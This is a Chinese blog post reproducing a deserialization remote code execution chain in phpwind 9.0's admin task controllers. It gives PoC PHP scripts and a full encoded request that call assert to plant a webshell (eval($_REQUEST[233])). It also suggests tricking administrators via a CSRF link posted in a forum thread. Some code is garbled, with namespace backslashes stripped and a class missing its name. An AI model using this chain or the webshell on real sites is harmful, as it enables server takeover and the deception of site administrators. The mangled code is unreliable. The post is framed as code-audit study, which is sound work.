%3c php 能用什么代替,Phpwind9

最新推荐文章于 2021-09-17 22:33:20 发布
最新推荐文章于 2021-09-17 22:33:20 发布
阅读量107 收藏
点赞数
文章标签: %3c php 能用什么代替

漏洞复现

复现环境Windows10

php5.6

phpwind9.0

漏洞要求系统为windows

需要有访问后台任务中心权限

复现过程step1 生成反序列化poc1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30header("Content-Type: text/plain");

require_once "test2.php";

class{

private $_callback;

private $_args;

function __construct()

{

$this->_callback = [

'assert'

];

$this->_args = [

["phpinfo() && file_put_contents('shell.php','<?php eval($_REQUEST[233]); ?>');"]

];

}

}

$obj = new stdClass();

$obj->a = new srclibraryutilityPwDelayRun();

$obj->b = new PwDelayRun();

echo serialize($obj);

echo "n";

echo urlencode(serialize($obj));

?>

namespace srclibraryutility;

class PwDelayRun{

}

?>

5ddbd94a29227.png

step2 使用admin账户登陆,然后请求http://127.0.0.1/phpwind9.0/admin.php?m=task&c=TaskConditionMember&a=profile&var=O%3A8%3A%22stdClass%22%3A2%3A%7Bs%3A1%3A%22a%22%3BO%3A30%3A%22src%5Clibrary%5Cutility%5CPwDelayRun%22%3A0%3A%7B%7Ds%3A1%3A%22b%22%3BO%3A10%3A%22PwDelayRun%22%3A2%3A%7Bs%3A21%3A%22%00PwDelayRun%00_callback%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22assert%22%3B%7Ds%3A17%3A%22%00PwDelayRun%00_args%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A1%3A%7Bi%3A0%3Bs%3A79%3A%22phpinfo%28%29%3Bfile_put_contents%28%27shell.php%27%2C%27%3C%3Fphp+eval%28%24_REQUEST%5B233%5D%29%3B+%3F%3E%27%29%3Bexit%3B%22%3B%7D%7D%7D%7D

代码成功执行

5ddbd94bd63dd.png

shell成功写入

5ddbd94dc8b10.png

漏洞分析

全局搜索找到反序列化位置

漏洞位置一共三处:1

2

3/src/applications/admin/TaskConditionBbsController.php

/src/applications/admin/TaskConditionMemberController.php

/src/applications/admin/TaskRewardController.php

这里使用/src/applications/admin/TaskConditionMemberController.php

5ddbd94f6d26f.png

$var = unserialize($this->getInput('var'));

,从Input中获取var参数的值,进行反序列化。 这个Input可以来自get/post/cookie。只要在phpwind里找到反序列化可以利用的点,就能在这里触发反序列化漏洞。

全局搜索_destruct

可以找到一个PwDelayRun类,其中遍历了_callback数组,用call_user_func_array执行任意函数。这里如果_callback可控,那么就可以直接执行assert+任意代码了。在/src/applications/admin/TaskConditionMemberController.php中,输入可以控制PwDelayRun类的序列化字符串,但是在执行反序列话之前必须定义了PwDelayRun类(也就是在此之前要包含过PwDelayRun所在的文档)

在TaskConditionMemberController::beforeAction::unserialize处下端点,并在之前输出当前所定义的所有类

5ddbd950f39bd.png

访问连接http://127.0.0.1/phpwind9.0/admin.php?m=task&c=TaskConditionMember&a=profile&var=

5ddbd9526911e.png

可以看到在此之前没有定义过PwDelayRun类,那么即使反序列化也不会调用相关方法

spl_autoload包含任意php文档

为了包含PwDelayRun类,作者提到了使用spl_autoloa方法,就是说如果要使用的类不存在,会调用框架自己注册的autoload方法加载类。在phpwind9中,实现了autoload方法,并注册了

5ddbd9544359b.png

5ddbd955c5a1d.png

但是这里className没有路径,PwDelayRun类在src/library/utility/PwDelayRun.php文档中,需要传入路径才可以包含到这个类。 虽然类名不能包含特殊字符,但类名中是可以包含的,这是php中空间命名。命名空间中可以包含,而在windows下,也可以作为路径的分隔符,因此可以在payload中使用命名空间生成序列化字符串,在phpwind9中找不到类的时候,就会使用include包含。而包含时只能在windows上使用,所以只限于windows系统。

但是,这里将类名设置为srclibraryutilityPwDelayRun,而 整个phpwind全局是没有使用命名空间的,也就是默认命名空间为,但现在的PwDelayRun类所在的命名空间为srclibraryutility。 这样,即使我包含了srclibraryutilityPwDelayRun.php文档,反序列化的时候是实例化的srclibraryutilityPwDelayRun类。但phpwind的命名空间是,上下文存在的类是PwDelayRun类,还是无法正常进行(得到的是一个不完整的类__php_incomplete_class,这是因为php反序列化一个对象,PHP无法找到原始类,所以PHP不知道,这个类是怎么样的):

5ddbd957262ee.png

只要生成srclibraryutilityPwDelayRun类和PwDelayRun类两个对象,放在一个数组中,在反序列化前者的过程中include目标文档,在反序列化后者的过程中拿到PwDelayRun对象

利用数组+命名空间加载相同名字的类

生成srclibraryutilityPwDelayRun类和PwDelayRun类两个对象,放在一个数组中,在反序列化前者的过程中include目标文档,在反序列化后者的过程中拿到PwDelayRun对象。但是有个数组判断,

5ddbd958d6f5c.png

这里如果反序列化后是个数组,就会保存到output中,导致变量不会在beforeAction结束时销毁,而是在脚本束时销毁。如果在结束时销毁,由于没有了上下文,poc中写文档那一步是写不进去的,除非文档路径给绝对给绝对路径,自己可以测试下。作者在分析中给了一个方法,就是用其他对象来替代数组,比如stdClass,

所以最后得到如下poc:1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28<?php

// test1.php

header("Content-Type: text/plain");

require_once "test2.php";

class PwDelayRun{

private $_callback;

private $_args;

function __construct()

{

$this->_callback = [

'assert'

];

$this->_args = [

["phpinfo() && file_put_contents('shell.php','<?php eval($_REQUEST[233]); ?>')"]

];

}

}

$obj = new stdClass();

$obj->a = new srclibraryutilityPwDelayRun();

$obj->b = new PwDelayRun();

echo urlencode(serialize($obj));

?>

//test2.php

namespace srclibraryutility;

class PwDelayRun{

}

?>

csrf

由于上面的代码执行链接是get请求,不需要post中的csrftoken或其他验证,所以可以写个帖子,插入恶意链接,等待管理员点击。但是帖子中把&编码了,导致请求不正常,不过可以增加一步跳转

总结

这个漏洞很犀利和巧妙,所以自己跟踪与学习了下,加强自己的代码审计与分析能力,还有学到一些新技能:可以调用get_declared_classes查看当前执行所加载的所有自定义类

反序列化时,如果反序列化点之前没有加载过要反序列化的类,spl_autoload可能会很有帮助,查看框架是否使用了autoload

反序列化时,可以使用一种对象替代另一种对象绕过某些判断(比如用stdClass替代array)

-------------本文结束感谢您的阅读-------------

weixin_39885469
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
phpwind9.0 超漂亮的模板
05-21
phpwind9.0在线版本,超漂亮的模板
rvtva3c的安装与使用WHR20190124.docx
09-06
《RvtVa3c安装与使用教程》 RvtVa3c是一款强大的Revit模型处理插件,主要用于将Revit模型导出为JSON格式,便于在Web环境下进行三维场景的展示和交互。以下是对该插件的安装和使用步骤的详细讲解。 一、安装RvtVa3c...
php后台提权,phpwind命令执行getshell(后台)
weixin_36482670的博客
03-10 636
### 简要描述:官网下载最新版### 详细说明:v9.0.1搭建好,登陆[](https://images.seebug.org/upload/201602/12102252ce0e0a04f54d200949718aa2bd67d7cc.png)在门户里选择页面管理,新增模块。自定义html[](https://images.seebug.org/upload/201602/12102352b...
PHP漏洞利用工具开发,PHPcms二次开发,PHPcms,DEDEcms简单代码审计
Love&Share
09-17 5691
PHP工具开发 文章目录PHP工具开发PHP小马一句话木马PHP大马分析实现大马后门编写大马PHP的cms二次开发PHP常见CMS的漏洞分析PHPstorm调试模式PHPCMSv9.2上传漏洞PHPCMSv9.6.0文件上传PHPCMSv9.6.0wap端sql注入PHPCMSV9.6.1任意文件读取PHPcmsv9暴力破解备份数据库名DEDECMS漏洞分析DEDECMS重装漏洞DEDECMS远程文件包含DEDECMSdownload文件SQL注入DEDECMSrecommend文件SQL注入 PHP小马
phpwind9.0 新时代的社区产品
feilong_12的专栏
05-20 2125
经过漫长的研发和严谨的调试,倍受关注的phpwind9。0终于和大家见面了。phpwind9。0是全新研发思想指导下的新一代社区产品,同时也是phpwind系列产品近10年社区产品经验的传承和升华,更是phpwind团队对于当前环境下社区产品形态这一命题所给出的完美答案。phpwind团队放弃了沿袭数年之久的旧架构转而采用了全新的WindFramework框架。     要想深入的理解phpw
php9.0论坛搭建默认,phpwind9.0
weixin_35672450的博客
03-20 615
phpwind9.0是一个基于基于PHP和MySQL的开源社区程序,同时也是国内最受欢迎的通用型论坛程序之一。主要的国内就是帮助用户快速搭建论坛以及社区网站。phpwind9.0的论坛系统具有多重的功能和特点;包括phpwind9.0具备着多重子版块,同时用户可以自由组合后台用户组权限。此外,phpwind9.0还具备分版块控制生成html页面、可选用的所见即所得编辑器、防止图片和附件防盗链、多附...
KEA驱动库.zip_12db3c yishikea_9cbi9f7 yishikea_attentionpjy_kea_驱动库
09-15
"KEA驱动库.zip_12db3c yishikea_9cbi9f7 yishikea_attentionpjy_kea_驱动库"的标题暗示了这个压缩文件是特定版本或修订版的KEA驱动库,可能由用户"yishikea"进行了整理或修改,并附带了一些标识符如"12db3c"和"9cbi...
3c509b_3com_3c95.com_3c95com_3C95COM_
10-02
3C509B的DOS驱动程序使得用户能在运行DOS的系统中安装并使用这款网络适配器,实现与网络的通信。 标签 "3com 3c95.com 3c95com 3C95COM" 提及的 "3c95.com" 可能是3Com的另一个产品或驱动程序文件名,或者与3C509B...
VisioH3C华三网络设备图标vVSS格式(大全)
05-07
《VisioH3C华三网络设备图标vVSS格式详解》 在IT行业中,网络设备的规划和设计是一项至关重要的工作,而精准的图表工具则能极大地提升工作效率。Visio,作为Microsoft提供的专业绘图软件,是网络工程师们常用的工具...
ARM9S3c2440 数据手册
04-19
ARM9S3c2410 是ARM9系列最常用的,三星公司生产,其升级版2440还支持视频,是比较实用的arm产品
浅析phpwind9.0之登陆机制
流浪天空
06-29 4964
首先当用户点击进入登陆页面后:(这里不讨论快速登陆和直接在页头登陆的情况,原理基本一致) 进入该类调用run成员函数进入页面初始化。该类继承自PwBaseController这个基础类,这基础类中关于风格会有一些处理。接着回到LoginController类,当用户输入了用户名和密码后,点击提交,调用该类的dorunAction()成员函数,大致流程就是判定验证码以及用户名和密码是否正确,然后形
CentOS7.0+phpwind9.0.1环境搭建
ballack_linux的专栏
07-04 1579
    本文是基于centos7.0 + apache2.0 + php5.6环境搭建的,不知道如何搭建的, 请查看以下链接:    https://blog.csdn.net/ballack_linux/article/details/80886248    首先到官网下载phpwind:    http://phpwind.com/product.html    下载后的文件为phpwind_...
phpwind9终于安装成功,赞一个
ahuan08的专栏
03-18 1650
原来是官网的安装包不行,后来看论坛说RC版的可以就到下载吧http://www.xiazaiba.com/html/442.html下载了phpwind9rc版的安装包,果然就行了 还有就是不支持mysql5.7 ,用mysql5.5就行。php,apahce24环境的配置,呵呵,百度咯
【3】phpwind v9.0.2 后台getshell
司徒荆的博客
06-05 1309
phpwind v9.0.2 后台getshell,进入后台后才可以
为什么论坛一般用PHP,为什么我要用phpwind代替discuz
weixin_39920338的博客
03-10 160
谈谈我的地方站(岳池视窗),08年大家都流行做分类信息和地方门户,当初打算做我们地级市的门户,看了看竞争实在太大:有两个信息港,其中一个是电信做的,另一个也是比较有经济实力的;另外还有什么信息网、信息通、信息窗等大大小小十几个,而且像58赶集等都设有分站,自己想在搜索引擎中取得一个好排名很不容易,而且没有成熟的符合自己使用的免费程序,于是放弃。调查我们所在县城的网站,当时有三个网站排的上号,有个论...
php二级目录,PHPWind论坛版块二级目录设置域名
weixin_33488806的博客
03-11 156
根目录下,版块二级目录设置为单独3级域名,也就是分论坛功能,会发现版块风格设置无效(单独版块风格设置是有效的)。在require目录中新建一个 skin.php 文件。内容如下:/*** 本程序是通过二级域名或者目录自动获取对应的名称和风格。* @author yipsilon* @version 1.0.20070506*/!function_exists('readover') &&a...
php页面文件目录,phpwind文件目录及页面功能
weixin_39658966的博客
03-22 256
Phpwind文件目录及页面功能?admin/?api/?attachment/ ?data/?hack/?htm_data/?images/?ipdata/?js/?lang/?lib/?mode/?require/?simple/?template/?wap/?active.php ?admin.php?ajax.php?alipay.php ?apps.php?cate.php?ck.php...
php 伪静态 获取当前页面路径_关于phpwind9实现目录式伪静态结构url
weixin_29275257的博客
12-29 228
参考:《百度搜索引擎优化指南》2.1.2网站结构里提到,合理的网站结构应该是一个扁平的树型网状结构。而且大家都应该知道权重方面:二级域名>目录>静态页>动态页。简单的说就是爬虫比较喜欢这种类型的url结构。基于此发现有些在使用phpwind9建站的站长总是要求url采用以下格式:首页: http://www.域名.com/ 首页栏目页: http://www.域名.co...
%1c%2c%3c什么意思
最新发布
07-25
这个字符串 "%1c%2c%3c" 是一种 URL 编码的形式,它表示的是 ASCII 字符集中的特定字符。具体来说,"%1c" 表示 ASCII 字符集中的 ASCII 值为 0x1c 的字符,"%2c" 表示 ASCII 值为 0x2c 的字符,"%3c" 表示 ASCII 值...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值